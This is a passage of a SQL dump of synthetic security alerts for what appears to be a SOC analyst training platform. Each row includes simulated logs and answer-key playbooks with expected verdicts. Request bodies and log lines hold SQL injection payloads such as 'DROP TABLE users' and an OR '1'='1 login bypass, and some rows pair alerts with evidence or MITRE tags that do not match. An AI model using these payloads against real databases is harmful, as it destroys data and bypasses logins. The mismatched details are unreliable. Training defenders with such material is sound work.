4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:00:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.40\\\",\\\"dst_ip\\\":\\\"198.51.100.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAP-404\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1438, 'Command Injection Attempt Detected', 'critical', 'Netskope', 'A command injection attempt was made against a web application, detected and blocked by security systems.', 'Web Attack', 'T1059', 0, 'investigating', 247, '{\"timestamp\":\"2026-03-02T15:00:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"203.0.113.70\",\"dst_ip\":\"192.168.1.50\",\"username\":\"webuser\",\"hostname\":\"CORP-WEB-505\",\"request_body\":\"id=1; DROP TABLE users;\"}', '2026-03-02 03:22:47', '2026-03-05 11:37:39', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.70\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple web attack attempts\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"id=1; DROP TABLE users;\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"SQL injection attempt detected\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The request body contained a SQL injection payload, confirming the attack attempt.\"}', 'Beginner', 'DLP', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.995Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T15:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.70\\\",\\\"dst_ip\\\":\\\"192.168.1.50\\\",\\\"username\\\":\\\"webuser\\\",\\\"hostname\\\":\\\"CORP-WEB-505\\\",\\\"request_body\\\":\\\"id=1; DROP TABLE users;\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.995Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET 
/login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T15:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.70\\\",\\\"dst_ip\\\":\\\"192.168.1.50\\\",\\\"username\\\":\\\"webuser\\\",\\\"hostname\\\":\\\"CORP-WEB-505\\\",\\\"request_body\\\":\\\"id=1; DROP TABLE users;\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.995Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T15:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.70\\\",\\\"dst_ip\\\":\\\"192.168.1.50\\\",\\\"username\\\":\\\"webuser\\\",\\\"hostname\\\":\\\"CORP-WEB-505\\\",\\\"request_body\\\":\\\"id=1; DROP TABLE users;\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.995Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T15:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.70\\\",\\\"dst_ip\\\":\\\"192.168.1.50\\\",\\\"username\\\":\\\"webuser\\\",\\\"hostname\\\":\\\"CORP-WEB-505\\\",\\\"request_body\\\":\\\"id=1; DROP TABLE users;\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.995Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T15:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.70\\\",\\\"dst_ip\\\":\\\"192.168.1.50\\\",\\\"username\\\":\\\"webuser\\\",\\\"hostname\\\":\\\"CORP-WEB-505\\\",\\\"request_body\\\":\\\"id=1; DROP TABLE users;\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(1439, 'Possible Insider Data Leak Detected', 'medium', 'Symantec DLP', 'An employee was detected attempting to send sensitive files to a personal email address.', 'Data Exfil', 'T1059', 1, 'Closed', 266, '{\"timestamp\":\"2026-03-02T16:00:00Z\",\"event_type\":\"email_sent\",\"src_ip\":\"192.168.1.55\",\"dst_ip\":\"10.0.0.10\",\"username\":\"jdoe\",\"hostname\":\"CORP-LAP-606\",\"email_sender\":\"jdoe@corporate.com\",\"email_receiver\":\"personalemail@example.com\"}', '2026-03-02 03:22:47', '2026-03-09 13:42:00', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"personalemail@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Email address linked to potential data exfiltration\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP of the user\'s laptop\"}}],\"expected_actions\":[\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The email attempt to a personal address with sensitive attachments indicates a potential insider threat.\"}', 'Beginner', 'DLP', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.997Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:00:00Z\\\",\\\"event_type\\\":\\\"email_sent\\\",\\\"src_ip\\\":\\\"192.168.1.55\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAP-606\\\",\\\"email_sender\\\":\\\"jdoe@corporate.com\\\",\\\"email_receiver\\\":\\\"personalemail@example.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.997Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:00:00Z\\\",\\\"event_type\\\":\\\"email_sent\\\",\\\"src_ip\\\":\\\"192.168.1.55\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAP-606\\\",\\\"email_sender\\\":\\\"jdoe@corporate.com\\\",\\\"email_receiver\\\":\\\"personalemail@example.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.997Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:00:00Z\\\",\\\"event_type\\\":\\\"email_sent\\\",\\\"src_ip\\\":\\\"192.168.1.55\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAP-606\\\",\\\"email_sender\\\":\\\"jdoe@corporate.com\\\",\\\"email_receiver\\\":\\\"personalemail@example.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.997Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:00:00Z\\\",\\\"event_type\\\":\\\"email_sent\\\",\\\"src_ip\\\":\\\"192.168.1.55\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAP-606\\\",\\\"email_sender\\\":\\\"jdoe@corporate.com\\\",\\\"email_receiver\\\":\\\"personalemail@example.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.997Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:00:00Z\\\",\\\"event_type\\\":\\\"email_sent\\\",\\\"src_ip\\\":\\\"192.168.1.55\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAP-606\\\",\\\"email_sender\\\":\\\"jdoe@corporate.com\\\",\\\"email_receiver\\\":\\\"personalemail@example.com\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1440, 'Failed Brute Force Login Attempt', 'low', 'Forcepoint', 'A login attempt failed due to incorrect credentials from an external IP, no further attempts were noted.', 'Credential Attack', 'T1078', 0, 'investigating', NULL, '{\"timestamp\":\"2026-03-02T17:00:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.80\",\"dst_ip\":\"192.168.1.60\",\"username\":\"jdoe\",\"hostname\":\"CORP-SVR-707\",\"failed_attempts\":1}', '2026-03-02 03:22:47', '2026-03-07 05:19:00', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.80\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"No malicious activity reported for this IP\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.60\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP of the server\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The failed login attempt was a one-off incident and does not indicate a brute force attack.\"}', 'Beginner', 'DLP', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.999Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T17:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.80\\\",\\\"dst_ip\\\":\\\"192.168.1.60\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-SVR-707\\\",\\\"failed_attempts\\\":1}\"},{\"timestamp\":\"2026-03-02T13:54:06.999Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T17:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.80\\\",\\\"dst_ip\\\":\\\"192.168.1.60\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-SVR-707\\\",\\\"failed_attempts\\\":1}\"},{\"timestamp\":\"2026-03-02T13:53:06.999Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T17:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.80\\\",\\\"dst_ip\\\":\\\"192.168.1.60\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-SVR-707\\\",\\\"failed_attempts\\\":1}\"},{\"timestamp\":\"2026-03-02T13:52:06.999Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T17:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.80\\\",\\\"dst_ip\\\":\\\"192.168.1.60\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-SVR-707\\\",\\\"failed_attempts\\\":1}\"},{\"timestamp\":\"2026-03-02T13:51:06.999Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T17:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.80\\\",\\\"dst_ip\\\":\\\"192.168.1.60\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-SVR-707\\\",\\\"failed_attempts\\\":1}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1441, 'Potential Unauthorized Data Transfer to Cloud Storage', 'medium', 'Netskope', 'Detected potential unauthorized upload of files to personal cloud storage service from an employee\'s machine.', 'Data Exfil', 'T1059', 0, 'investigating', NULL, '{\"timestamp\":\"2026-03-02T18:00:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"192.168.1.65\",\"dst_ip\":\"203.0.113.90\",\"username\":\"jdoe\",\"hostname\":\"CORP-DESK-808\",\"url\":\"http://personalcloud.example.com/upload\"}', '2026-03-02 03:22:47', '2026-03-03 12:15:59', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"url\",\"value\":\"http://personalcloud.example.com/upload\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Personal cloud storage, no malicious activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.65\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP of the user\'s workstation\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The upload was to a verified personal cloud account, flagged due to policy but not malicious.\"}', 'Beginner', 'DLP', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:07.000Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T18:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.1.65\\\",\\\"dst_ip\\\":\\\"203.0.113.90\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DESK-808\\\",\\\"url\\\":\\\"http://personalcloud.example.com/upload\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:07.000Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T18:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.1.65\\\",\\\"dst_ip\\\":\\\"203.0.113.90\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DESK-808\\\",\\\"url\\\":\\\"http://personalcloud.example.com/upload\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:07.000Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T18:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.1.65\\\",\\\"dst_ip\\\":\\\"203.0.113.90\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DESK-808\\\",\\\"url\\\":\\\"http://personalcloud.example.com/upload\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:07.000Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T18:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.1.65\\\",\\\"dst_ip\\\":\\\"203.0.113.90\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DESK-808\\\",\\\"url\\\":\\\"http://personalcloud.example.com/upload\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:07.000Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T18:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.1.65\\\",\\\"dst_ip\\\":\\\"203.0.113.90\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DESK-808\\\",\\\"url\\\":\\\"http://personalcloud.example.com/upload\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1442, 'Successful Data Exfiltration to External Server', 'critical', 'Forcepoint', 'Sensitive data was successfully transferred to a known external server without authorization.', 'Data Exfil', 'T1059', 1, 'Closed', 225, '{\"timestamp\":\"2026-03-02T19:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.70\",\"dst_ip\":\"203.0.113.100\",\"username\":\"jdoe\",\"hostname\":\"CORP-LAP-909\"}', '2026-03-02 03:22:47', '2026-03-06 10:00:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.70\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP of the user\'s laptop\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in data exfiltration incidents\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The external server IP is linked to data exfiltration, confirming the breach.\"}', 'Beginner', 'DLP', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:07.006Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T19:00:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.70\\\",\\\"dst_ip\\\":\\\"203.0.113.100\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAP-909\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:07.006Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T19:00:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.70\\\",\\\"dst_ip\\\":\\\"203.0.113.100\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAP-909\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:07.006Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T19:00:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.70\\\",\\\"dst_ip\\\":\\\"203.0.113.100\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAP-909\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:07.006Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T19:00:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.70\\\",\\\"dst_ip\\\":\\\"203.0.113.100\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAP-909\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:07.006Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T19:00:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.70\\\",\\\"dst_ip\\\":\\\"203.0.113.100\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAP-909\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1443, 'Initial Access via Spear Phishing', 'medium', 'Employee Email', 'An email from a seemingly legitimate aerospace industry contact contains a malicious link leading to a compromised website, setting the stage for network infiltration.', 'Social Engineering', 'T1566.001 - Spear Phishing Link', 1, 'Closed', 232, '{\"timestamp\":\"2023-10-12T08:45:00Z\",\"source_ip\":\"172.217.18.110\",\"destination_ip\":\"10.0.0.15\",\"source_email\":\"j.smith@aerospace-experts.com\",\"destination_email\":\"t.miller@contractor-network.com\",\"subject\":\"Exciting Collaboration Opportunity\",\"malicious_link\":\"http://compromised-site.com/login\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"email_id\":\"<a1b2c3d4e5f6@example.com>\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"Project_Plan.pdf\"}', '2026-03-03 22:01:10', '2026-03-13 16:22:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"172.217.18.110\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"IP address belongs to the contractor\'s network.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"j.smith@aerospace-experts.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"suspicious\",\"details\":\"Email address used in similar phishing incidents.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://compromised-site.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URL Analysis Tool\",\"verdict\":\"malicious\",\"details\":\"URL hosts phishing landing 
page.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Hash Database\",\"verdict\":\"clean\",\"details\":\"Hash belongs to an empty file, potential decoy.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access via Spear Phishing\",\"date\":\"2026-03-03T22:56:57.368Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1444, 'Execution of Custom Mac Malware', 'high', 'Endpoint Detection System', 'The attackers deployed custom Mac malware on a target system within the network. This malware is designed to evade detection and establish control over the system, allowing attackers to potentially pivot further into the network.', 'Malware Deployment', 'T1059.003 - Command and Scripting Interpreter: AppleScript', 1, 'Closed', 225, '{\"timestamp\":\"2023-10-12T14:23:32Z\",\"event_id\":\"mac_malware_exec_001\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"username\":\"jdoe\",\"malware_filename\":\"launchProxy\",\"file_hash\":\"3fa8f88c9b1e237e9b6c8e1e4d9e2f7c\",\"action\":\"execution\",\"status\":\"blocked\",\"detection_method\":\"signature-based detection\",\"signature_name\":\"CustomMacMalware.v1\"}', '2026-03-03 22:01:10', '2026-03-09 03:22:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known command and control server associated with Lazarus Group.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"launchProxy\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection System\",\"verdict\":\"malicious\",\"details\":\"Malware designed to evade detection on MacOS systems.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3fa8f88c9b1e237e9b6c8e1e4d9e2f7c\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malicious Mac malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
